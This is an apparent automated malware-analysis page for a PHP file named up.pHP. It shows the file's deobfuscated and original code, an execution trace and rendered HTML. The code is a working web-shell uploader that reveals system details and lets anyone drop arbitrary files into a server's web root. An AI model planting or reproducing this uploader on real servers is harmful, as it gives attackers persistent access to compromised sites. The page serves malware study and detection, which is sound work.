up.pHP

md5: 60b9beff6a87b8eadde2294a37fbd814

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original, Traces)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<?php

echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\r\n      <input type='file' name='Fole'>\r\n      <input type='submit' name='upload' value='upload'>\r\n      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['Fole']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['Fole']['tmp_name'], $dest)) {
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Success! ==>> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Failed!";
        }
    } else {
        if (@copy($_FILES['Fole']['tmp_name'], $files)) {
            echo "Success! <b>{$files}</b> at this folder";
        } else {
            echo "Failed!";
        }
    }
}
Execution traces
data/traces/60b9beff6a87b8eadde2294a37fbd814_trace-1676255860.6949.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:38:06.592723]
1	0	1	0.000148	393464
1	3	0	0.000226	398688	{main}	1		/var/www/html/uploads/up.pHP	0	0
2	4	0	0.000242	398688	php_uname	0		/var/www/html/uploads/up.pHP	2	0
2	4	1	0.000256	398800
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/up.pHP	7	$root = '/var/www/html'
1		A						/var/www/html/uploads/up.pHP	8	$files = NULL
1		A						/var/www/html/uploads/up.pHP	9	$dest = '/var/www/html/'
1	3	1	0.000332	398728
			0.000358	314336
TRACE END   [2023-02-13 00:38:06.592965]

Generated HTML code
<html><head></head><body><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
      <input type="file" name="Fole">
      <input type="submit" name="upload" value="upload">
      </form></body></html>
Original PHP code
<?php
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='Fole'>
      <input type='submit' name='upload' value='upload'>
      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['Fole']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['Fole']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Success! ==>> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Failed!";
        }
    } else {
        if(@copy($_FILES['Fole']['tmp_name'], $files)) {
            echo "Success! <b>$files</b> at this folder";
        } else {
            echo "Failed!";
        }
    }
}
?>
PHP Malware Analysis

up.pHP

md5: 60b9beff6a87b8eadde2294a37fbd814

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
